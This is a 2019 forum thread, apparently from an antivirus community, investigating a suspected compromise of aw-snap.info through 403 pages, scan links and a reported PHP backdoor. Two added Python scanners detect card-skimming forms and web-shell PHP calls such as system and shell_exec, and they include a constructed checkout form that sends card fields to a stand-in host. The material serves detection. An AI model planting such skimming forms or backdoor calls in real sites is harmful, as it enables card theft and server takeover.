Author Topic: aw-snap.info with malware? Redirects to -https://aw-snap.info/403.htm


Offline polonus

« Last Edit: December 09, 2019, 07:30:25 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline DavidR

Re: aw-snap.info with malware? Redirects to -https://aw-snap.info/403.htm
« Reply #1 on: December 09, 2019, 10:28:17 PM »
I used to see this a long time ago but with the 404 error (missing file/page/image, etc.). 

The hack was to create a specific malicious 404 error page and edit the normal home page (or any other), inserting a link to a non-existent page/image, etc., triggering the malicious 404 page. 

I just wonder if there isn't something similar going on here.
WinXP ProSP3/ Core2Duo E8300/ 4GB Ram/ avast! free 18.5.2342/ Firefox ESR, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ DropMyRights/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security
Windows 10 Home 1909 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 19.8.2393 (build 19.8.4793.544) UI-1.0.415/ WinPatrol+/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ WinPatrol+/

Offline Pondus

Re: aw-snap.info with malware? Redirects to -https://aw-snap.info/403.htm
« Reply #2 on: December 09, 2019, 10:42:58 PM »
Description: Malicious scripts injected into Magento (and other e-commerce) sites that try to steal payment details and site credentials from website forms. Typically they hijack login and checkout forms and send entered data to a remote third-party site controlled by the attackers. Sometimes the script may redirect online shoppers to fake checkout pages.


https://www.virustotal.com/gui/file/b23b9fc160fada7c57050a59485fbdcf50f406c4ba89d8320fd8efeb842f689d/detection
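Both of the patterns described in the two replies above (DavidR's doctored 404 page carrying active content, and Pondus's form hijack that posts entered data to a third-party host) can be caught with a static look at the HTML a server returns. The script below is an added example, not code from this thread or from any scanner named in it; the hostnames (shop.example, stats-cdn.example, checkout-verify.example) and the three page bodies are constructed for illustration.

```python
# Added example (not code from the thread or from any scanner named in it):
# a static audit of an HTML page that flags the two patterns discussed above,
# (1) an error page (403/404) that carries active content, and
# (2) forms, scripts or iframes that hand data to a host outside the site.
# The hostnames and page bodies below are constructed for illustration.
from html.parser import HTMLParser
from urllib.parse import urlparse


class _Collector(HTMLParser):
    """Collect the attributes that matter for the audit; ignore the rest."""

    def __init__(self):
        super().__init__()
        self.forms, self.scripts, self.iframes, self.refreshes = [], [], [], []
        self.inline_scripts = 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append(a.get("action") or "")
        elif tag == "script":
            if a.get("src"):
                self.scripts.append(a["src"])
            else:
                self.inline_scripts += 1
        elif tag == "iframe":
            self.iframes.append(a.get("src") or "")
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.refreshes.append(a.get("content") or "")


def _offsite(url, site_host):
    """True when url points at a host other than site_host or its subdomains."""
    host = urlparse(url).netloc.lower().rsplit("@", 1)[-1].split(":")[0]
    return bool(host) and host != site_host and not host.endswith("." + site_host)


def audit_page(html, site_host, error_page=False):
    """Return a list of human-readable findings; an empty list means no hit."""
    c = _Collector()
    c.feed(html)
    c.close()
    findings = []
    findings += [f"form posts off-site: {u}" for u in c.forms if _offsite(u, site_host)]
    findings += [f"third-party script: {u}" for u in c.scripts if _offsite(u, site_host)]
    findings += [f"third-party iframe: {u}" for u in c.iframes if _offsite(u, site_host)]
    findings += [f"meta refresh redirect: {v}" for v in c.refreshes]
    # A server error page has no business running scripts or collecting input.
    if error_page and (c.scripts or c.inline_scripts or c.iframes or c.forms):
        findings.append("error page carries active content")
    return findings


# Constructed samples: an Apache-style 403 body, a doctored 404 page and a
# checkout form whose action has been pointed at a host the site does not own.
CLEAN_403 = """<html><head><title>403 Forbidden</title>
<link rel="shortcut icon" href="http://shop.example/favicon.ico"></head>
<body><h1>Forbidden</h1><p>You don't have permission to access / on this server.</p>
<hr><address>Apache Server at shop.example Port 80</address></body></html>"""

DOCTORED_404 = """<html><head><title>404 Not Found</title>
<meta http-equiv="refresh" content="0;url=https://stats-cdn.example/landing">
<script src="//stats-cdn.example/j.js"></script></head>
<body><h1>Not Found</h1></body></html>"""

SKIMMED_CHECKOUT = """<html><body>
<form method="post" action="https://checkout-verify.example/submit">
<input name="cc"><input name="cvv"></form></body></html>"""

if __name__ == "__main__":
    for name, page, is_err in [("403", CLEAN_403, True), ("404", DOCTORED_404, True),
                               ("checkout", SKIMMED_CHECKOUT, False)]:
        print(name, audit_page(page, "shop.example", error_page=is_err) or "clean")
```

Run it against the body of a site's own error pages (request a path that does not exist and pass error_page=True) and against the login and checkout pages; a legitimate payment provider's domain will show up as a finding too, so keep an allow-list of hosts the shop is known to use rather than treating every hit as a compromise.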



Offline polonus

Re: aw-snap.info with malware? Redirects to -https://aw-snap.info/403.htm
« Reply #3 on: December 09, 2019, 11:01:38 PM »
Script injection malcode, thank you DavidR and Pondus for putting the detection-cherry on the cake.
The proof of the pudding is indeed in the eating, but we had to taste it first...

For the moment I get here with the 403 error
Quote
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
<link href='-http://aw-snap.info/wp-content/redleg_sm.ico' rel='icon' type='image/x-icon'/>
<link rel="shortcut icon" href="-http://aw-snap.info/wp-content/redleg_sm.ico" />
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access / on this server.</p>
<hr>
<address>Apache Server at -aw-snap.info Port 80</address>
</body></html>

VT gives as clean:  -http://aw-snap.info/wp-content/redleg_sm.ico,
somehow the connection is not encrypted and not secure.
So Redleg has some cleansing to do on his own website analysis website  ;D  :(

pol

Offline polonus

Re: aw-snap.info with malware? Redirects to -https://aw-snap.info/403.htm
« Reply #4 on: December 10, 2019, 01:36:43 PM »
aw-snap.info still won't open up in my browser: https://urlscan.io/result/4531ae42-1111-491a-b060-42df0288700b/
see: https://urlscan.io/result/4531ae42-1111-491a-b060-42df0288700b/#links
response html: https://urlscan.io/result/4531ae42-1111-491a-b060-42df0288700b/#transactions
behavior: https://urlscan.io/result/4531ae42-1111-491a-b060-42df0288700b/#behaviour
Indicators of compromise (around an attack): https://urlscan.io/result/4531ae42-1111-491a-b060-42df0288700b/#iocs
host details: https://www.shodan.io/host/107.180.40.144
Website test results: https://internet.nl/site/aw-snap.info/671442/
1 malicious file detected: https://quttera.com/detailed_report/www.aw-snap.info
File:
Quote

index.html
Severity:   Malicious
Reason:   Detected malicious PHP content
Details:   Detected PHP backdoor
Offset:   3162
Threat dump:   index html - blocked
Threat dump MD5:   0DEAEF3CF103258A26211AB017E008E6
File size[byte]:   10618
File type:   HTML
Page/File MD5:   9818584FD5B51A3DEA390ACD83ADDFE0
Scan duration[sec]:   0.08

pol
« Last Edit: December 10, 2019, 01:54:49 PM by polonus »
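The quttera report quoted above flags "malicious PHP content" at a byte offset inside index.html, together with the file's MD5 and size. The script below is an added example of the kind of check that produces such a report; it is not quttera's scanner or any other tool named in this thread, and the sample file content (SAMPLE_INDEX) is constructed.

```python
# Added example (not the quttera scanner or any other tool named in the thread):
# the kind of check that produces a report like the one quoted above, a PHP
# block found inside a file that should be plain HTML, reported with its byte
# offset, the file MD5 and size. The sample file content is constructed.
import hashlib
import re

PHP_OPEN = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
# Calls that have no place in a static .html file; the presence of any PHP
# at all is already reported, these only raise the severity.
SUSPICIOUS = (b"eval(", b"base64_decode(", b"gzinflate(", b"str_rot13(",
              b"system(", b"shell_exec(", b"passthru(", b"create_function(")


def scan_html_bytes(data: bytes) -> dict:
    """Report every PHP block in data with its offset and suspicious calls."""
    report = {"md5": hashlib.md5(data).hexdigest().upper(), "size": len(data),
              "findings": []}
    for m in PHP_OPEN.finditer(data):
        end = data.find(b"?>", m.end())
        block = data[m.start():end + 2] if end != -1 else data[m.start():]
        hits = [f.decode() for f in SUSPICIOUS if f in block.lower()]
        report["findings"].append({"offset": m.start(),
                                   "severity": "malicious" if hits else "suspicious",
                                   "functions": hits})
    return report


# Constructed sample: an ordinary page with a PHP block spliced into it.
SAMPLE_INDEX = (b"<!DOCTYPE html><html><head><title>Shop</title></head><body>\n"
                b"<p>Welcome</p>\n<?php $d = base64_decode($q); ?>\n</body></html>\n")

if __name__ == "__main__":
    rep = scan_html_bytes(SAMPLE_INDEX)
    print(f"Page/File MD5: {rep['md5']}  File size[byte]: {rep['size']}")
    for f in rep["findings"]:
        print(f"Offset: {f['offset']}  Severity: {f['severity']}  Calls: {f['functions']}")
```

PHP tags in an .html file are only an anomaly when the web server is not configured to run .html through the PHP handler, so check the server configuration before treating a hit as a backdoor; the offset lets you inspect the block directly and compare the file against a known-good copy from version control or a backup.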